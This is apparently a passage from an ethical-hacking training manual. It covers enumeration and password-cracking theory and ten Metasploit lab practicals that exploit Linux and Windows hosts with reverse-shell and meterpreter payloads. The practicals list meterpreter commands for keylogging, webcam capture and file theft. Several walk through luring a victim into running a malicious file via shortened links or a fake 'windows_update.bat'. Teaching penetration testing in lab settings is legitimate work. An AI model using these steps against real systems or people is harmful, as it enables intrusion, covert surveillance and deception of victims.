which uses UDP protocol to maintain and manage routers, hubs, switches and
other network devices. SNMP is a popular protocol found enabled on a variety
of operating systems like Windows Server, Linux & UNIX servers as well as
network devices.

SMTP Enumeration
SMTP enumeration allows us to determine valid users on the SMTP
server. With the help of built-in SMTP commands, we can gather useful
information.
1. VRFY - Is used for validating users.
2. EXPN – Reveals the actual delivery address of mailing lists.
3. RCPT TO - It defines the recipients of the message.
Countermeasures
 Install IDS & IPS to detect and stop Enumerating attacks done on any
ports.
 Install honeypot application in a proxy server to give false information to
the hacker.
 Upload robots.txt file in the website to stop Footprinting of directories.
 Enable DNSSec option in server OS to avoid information leakage through
DNS server.
 Hosts can be locked down and securely configured and patched. Limit
services to only those needed.
 Network services can be locked down and made not to give up as much
useful information to a hacker.
 Changing default security configuration is very important.
 Block ports to unknown hosts.
 Turn off file and print sharing services in windows.
 Prevent DNS zone transfers to unknown hosts.
System Hacking
Theory

Hacking with
System Hacking
System hacking is the process of trying to compromise the target system
with the help of the information we collect from the pre-attack phases
(Footprinting and scanning).

Metasploit
Metasploit is a Framework used for developing and executing exploit
code against a remote target machine. Metasploit Framework contains following
modules
● Exploits ● Encoders
● Payloads ● Post
● Auxiliary ● Nop’s

Components of the Metasploit:

● Msfconsole
● Msfvenom
● Armitage

Exploit
Exploits can help gain superuser-level access to a computer system.
Hackers manage to gain low-level access; then they try to escalate privileges to
the highest level (root). The exploit becomes unusable; once the vulnerability is
fixed through a patch
Exploits are Classified based on how the exploit communicate with the
vulnerable software.

● A remote exploit works over a network and exploits the security

vulnerability without any prior access to the vulnerable system.
● A local exploit requires prior access to the vulnerable system and escalate
the privileges of the person running the exploit.
Payload
The payload is the piece of code in the exploit which performs a malicious
action, i.e., deleting data, providing the remote connection, sending spam or
encrypting data.

Types of Payload
The Metasploit framework has three different types of payloads
1. Singles
2. Stagers
3. Stages

Single Payload
Singles are self-contained payloads. They perform a simple task like
adding a user to the target computer and running executable files in the victim’s
computer. These kinds of payloads can be caught with non-Metasploit handlers
such as netcat. These payloads are more stable because they contain everything
in one.
Stager payload
Stager payloads are used to set up a network connection between the
attacker and victim and provide the remote connection to execute commands. It
is difficult to do both of these well, so the result is multiple similar stagers.
Metasploit will use the stagers to create the buffer memory in a small portion of
memory; these stagers are responsible for downloading a large payload (the
stage), injecting it into memory, and passing execution to it.
Stage payload
Stage Payloads are the components of the stagers that are downloaded in
the exploited pc by the Stagers. The various payload stages provide the
advanced features with no size limit such as Meterpreter, VNC injection, etc.

Escalating Privileges
Privilege escalation is a technique to exploit existing vulnerabilities in
design, misconfigurations in an operating system or in any installed applications
to gain elevated access to resources that are usually protected from an
application or user.

Vertical Privilege Escalation

The attacker grants himself higher privileges. Privilege escalation is
typically achieved by performing kernel-level operations that allow the attacker
to run unauthorized code.
Horizontal Privilege Escalation
Attacker’s use the same level of privileges he already has been granted,
but assume the identity of another user with similar privileges.

Password Cracking
In password cracking, hackers use a different kind of attacks to know the
target computer login password so that they can gain complete access.

Types of passwords
Passwords with only letters Ex: admin
Passwords with letters and numbers Ex: admin123
Passwords with letters and special characters Ex: admin@
Passwords with only numbers Ex: 6842
Passwords with only special characters Ex: @!#$%%^
Passwords with numbers and special characters Ex: 1234!@#$
Passwords with letters, numbers and special characters Ex: admin@123

Methods To Crack password

Password Guessing – Not a technique, but usually the first thing that every
criminal will try to do.
Brute Force Attack – All possible permutations & combinations of the
keyboard are tried as the victim's password. All passwords have to be some
permutation or combination of victim's keyboard characters.
Dictionary Based Attack – All words in the dictionary are tried as the victim’s
password.
Syllable attack – Combination of both, brute force attack and a dictionary
attack. This is often used when the password is a nonexistent word.
Default Passwords – Manufacturers configure the hardware or software with
default passwords and settings. We can get default passwords online for devices
(http://defaultpassword.us/).
Data Sniffing – Data sniffer to record passwords being sent across the LAN
network in plaintext format.

Countermeasures
● Keep Operating system software updated (patched).
● Use stronger authentication methods.
● Enable security auditing to help monitor attacks.
● Avoid storing user names/password on disk.
● Change passwords on a frequent basis.
● Build user awareness on social engineering attacks.
System Hacking
Lab Manual

Hacking with
 INDEX
S. No. Practical Name Page No.
1 Hacking Linux OS using Metasploit Framework 1
2 Hacking Linux operating system with Samba vulnerability 4
3 Steps to hack Linux OS using Metasploit framework 7
4 Hacking Windows Server 2003 with MS08_067 exploit 9
5 Hacking Windows 7 Operating System with 12
ms17_010 exploit
6 Meterpreter Commands 19
7 Hacking windows machine with MS15_100 exploit 25
8 Hacking Windows 7 using Firefox addon exploit 29
9 Hacking windows computer using vulnerability in 32
office application
10 Hacking Windows 10 using PowerShell commands 34
 Practical 1: Hacking Linux OS using Metasploit Framework

Execute the following commands to start Metasploit framework.

Consider metasploitable2 as a target for this practical. Perform port scan using nmap to identify
vulnerable services on the target machine.

It is identified that the target is running a vulnerable version of vsftpd on port number 21. To
exploit the target machine with the help of vulnerable software running on port 21 follow the
steps below.
Use search command to search exploit for vsftpd 2.3.4

Execute the following command to load exploit (use command is used to load exploits).

By executing show options command, we can view options that need to be configured for exploit.

Page | 1
To set RHOST value, execute the following command.

To list all suitable payloads that work with the above exploit, execute show payloads command

To configure payload, execute the set command as shown below

Execute show options command, to view options that need to be configured for payload.

To set LHOST and LPORT values for payload, execute the following command.

Page | 2
Finally, execute the exploit command to gain access to the target machine.

We can execute Linux commands.

Page | 3
 Practical 2: Hacking Linux operating system with Samba vulnerability

Open kali Linux terminal, enter the following commands to start the Metasploit framework
service postgresql start
msfconsole

Search for an exploit using usermap_script

Search usermap_script

To configure exploit, enter the below command

use <exploit path>

To view exploit options, execute show options

To configure RHOST, use set command

set RHOST <IP address>

Page | 4
to list suitable payloads for configured exploit, execute show payloads

To configure payload, set PAYLOAD cmd/unix/reverse

to view payload options, show options

to configure Payloads options, set LHOST <IP address> and set LPORT <Port No>

if all options are properly configured then exploit

Page | 5
Page | 6
 Practical 3: Steps to hack Linux OS using Metasploit framework

Consider metasploitable2 as a target for this practical. After performing a port scan using nmap, we
can observe that the target is running UnrealIRC on port number 6667. To exploit the target, start
Metasploit framework and search for unrealirc. Load exploit and set RHOST and RPORT options.

Select a payload that suits our requirements, set payload and payload options as shown
below.

Verify exploit and payload options before running exploit command. RHOST and LHOST
must be target and attackers IP addresses respectively. RPORT value, in this case, is 6667 as
we are targeting the vulnerable application running on this port at target’s end. LPORT can
be any valid port number on which attacker want to handle the reverse connection.

Page | 7
Executing exploit command will help us gain access to the target machine.

After gaining access to the target machine, we can execute Linux commands to explore
directories and do more.

Page | 8
 Practical 4: Hacking Windows Server 2003 with MS08_067 exploit

Execute following commands in terminal to start the Metasploit framework

service postgresql start
msfconsole
or simply click on Metasploit Framework icon in dork

Search for exploit ms08_067 using the search command

search <Exploit Code>

To configure exploit, enter the below command

use <exploit path>
Verify exploit options using show options command; it is observed that we need to set RHOST.
Execute set RHOST <IP address> to set RHOST value.

Page | 9
Choose a suitable payload by executing show payloads command and set payload using set
PAYLOAD windows/meterpreter/reverse_tcp_allports command and verify payload options.

To set Payloads options, enter the following commands

set LHOST <IP address>
set LPORT <Port No>
Page | 10
Make sure to verify exploit and payload options, if everything is configured correctly then execute
the exploit command to gain access to the target machine. Wait for reverse connection, as we
have selected meterpreter payload, we gain meterpreter access using which we can control
target computer.

Page | 11
 Practical 5: Hacking Windows 7 Operating System with
ms17_010 exploit
Start Metasploit Framework and search for ms17_010 exploit

Configure the exploit as shown below.

Verify the exploit options and set RHOST value to the target’s IP address

In this practical, let us perform an attack using three different payloads.

Payload 1:
At first, we will start with a payload that helps us gain shell access to the target computer. Execute
show payloads command and choose shell payload from the list of payloads.

Page | 12
To set payloads options, enter the following commands
set LHOST <IP address>
set LPORT <Port No>

Verify the configured options, then execute exploit command to gain shell access.

Page | 13
Here we are targeting Windows 7 machine, so after exploitation, we got windows shell prompt
where we can execute different MS-DOS commands to grab some sensitive information from the
target machine.

Payload 2:
Now let us use a different payload that provides a graphical view of the target computer as a
separate window on attacker’s machine. Here, we need to change payload to perform desired
operation (remove shell payload and add another payload). Execute the unset payload command
to remove the previous payload. To gain graphical access select
windows/x64/vncinject/reverse_tcp payload from the list of payload options.

Page | 14
To set Payloads options, enter the following commands
set LHOST <IP address>
set LPORT <Port No>

Page | 15
Check the configured options and execute the exploit command, which automatically opens a
separate window with target’s computer (Windows 7) interface as shown in below image.

Payload 3:
Now let us use a meterpreter payload to gain more control over the target system. We need to
change payload to windows/meterpreter/reverse_tcp

Page | 16
To set Payloads options, enter the following commands
set LHOST <IP address>
set LPORT <Port No>

if everything is properly configured then and run exploit command to gain meterpreter access to
the target machine.

Page | 17
Page | 18
 Practical 6: Meterpreter Commands

sysinfo - To know details about the target system.

ifconfig - To identify the victim’s IP address.

pwd - To know the current working directory is

cd - To change the directory

ls - To list all available files in the current directory

Page | 19
cat - To read the contents of the file.

download - Used to download any file form the victim PC to attacker PC

rm - To delete any file(s)

Page | 20
upload - Used to upload any file form attacker machine to victim machine.
We need to give the complete file path to transfer that file successfully.

background - Used to come out of a valid session without losing it.

We can use sessions –i <ID no> command

To choose a particular session from a list of active sessions.

Page | 21
keyscan_start - To start a passive keylogger on the target machine

keyscan_dump - To get keylogger logs

keyscan_stop - To stop the keylogger

ps - to list running processes and their Process IDs (PIDs)

migrate - Used to jump from one process (PID) to another process

getuid - Used to know userid of the target machine

getpid - Used to know the running process ID (active session)

Page | 22
execute - To execute any executable file like a .exe or .msi on the target machine

screenshot - Used to capture the screen of victim’s machine, the image is saved to root directory in
attacker’s machine.

We can turn-on victim’s webcam and stream (live) with webcam_stream command

Page | 23
To take pictures from victim webcam use webcam_snap option

shell - To enter in to shell or cmd or terminal.

Page | 24
 Practical 7: Hacking windows machine with MS15_100 exploit.

load Metasploit Framework using

service postgresql start
msfconsole

Search exploit using search ms15_100 command

load exploit using following command

use <exploit path>

Verify options by executing show options command

Page | 25
Page | 26
to set exploit options, execute following commands
set SRVHOST <attacker IP>
set FILENAME
<filename.mcl>
set FILE_NAME <filename.exe>

To configure payload and set payload options, run following commands

set PAYLOAD <payload name>
set LHOST <attacker IP>
set LPORT <attacker port>

Finally, execute exploit command to gain access to target computer.

After exploitation, it is observed that crack.mcl file is created and stored on attacker’s computer at
/root/.msf5/local/crack.mcl location. We need to share this malicious windows media player file
with that target.
Follow the steps below to trick our target to download and execute the above created malicious
file.
At first copy the malicious file on to desktop using cp command
cp /root/.msf5/local/crack.mcl /root/Desktop

Visit https://send.firefox.com and upload crack.mcl file saved on Desktop.

Page | 27
This website generates a link from where anyone can download the malicious file (crack.mcl) over
the internet.

we can even shorten the link created by send.firefox.com using any online URL shortening
services (http://tinyurl.com)

Page | 28
Convince our target to click on the link, download and execute crack.mcl

If the target executes downloaded the malicious file (crack.mcl), then a new meterpreter session
opens on attacker’s machine.

Page | 29
 Practical 8: Hacking Windows 7 using Firefox addon exploit

Start Metasploit Framework and search for firefox exploit using following search command
search firefox_xpi

Load exploit using use command as shown below

Verify options by executing show options command

Configure SRVHOST, SRVPORT, URIPATH as shown below

Run show targets command and set a target to Native Payload as shown in below image

Page | 30
Set a windows/meterpreter_reverse_tcp payload using set payload command

Verify exploit and payload options using show options command

Set LHOST and LPORT values for payload

Page | 30
Once everything is configured correctly, run exploit command to start the malicious server.

Share http://192.168.1.107:80/ link with the victim. If the victim clicks on the malicious link
(in firefox browser version <40) then a new meterpreter session start on attacker’s machine
as shown in below image.

Page | 31
 Practical 9: Hacking windows computer using a vulnerability in
office application
Start Metasploit Framework and search for an office_word exploit

load exploit use command and verify exploit options using show options command

Change filename and set SRVHOST value.

Choose a windows meterpreter payload to gain reverse connection.

Page | 32
Set attacker’s IP address as LHOST any add any valid port number under LPORT. After configuring
values, run exploit command

Share http://192.168.1.102:8080/default.hta with the target and convince them to click on the link
and download a malicious file. Soon after target executes that malicious file, a new meterpreter
session opens on attacker’s machine.

Page | 33
 Practical 10: Hacking windows 10 using PowerShell commands

Load Metasploit Framework and search for web_delivery exploit.

Load the above exploit using use command and verify exploit options.

As this is a client-side attack add attacker’s IP address under SRVHOST and set URIPATH to /

Verify exploit options. In this case, we can observe that by default a python payload is added. To
remove the default payload, execute unset payload command.

Page | 34
After removing the default payload execute show targets command and set a target to PSH
(PowerShell). Add LHOST and LPORT values.

Page | 35
run exploit command.

Copy the exploit code and save that as .bat (windows_update.bat) file in /var/www/html

Run Apache web server as shown below.

Create a link (refer practical 7) that can help your target download the malicious file

If the target executes the malicious file, then a new meterpreter session starts on the attacker’s
machine.

Page | 36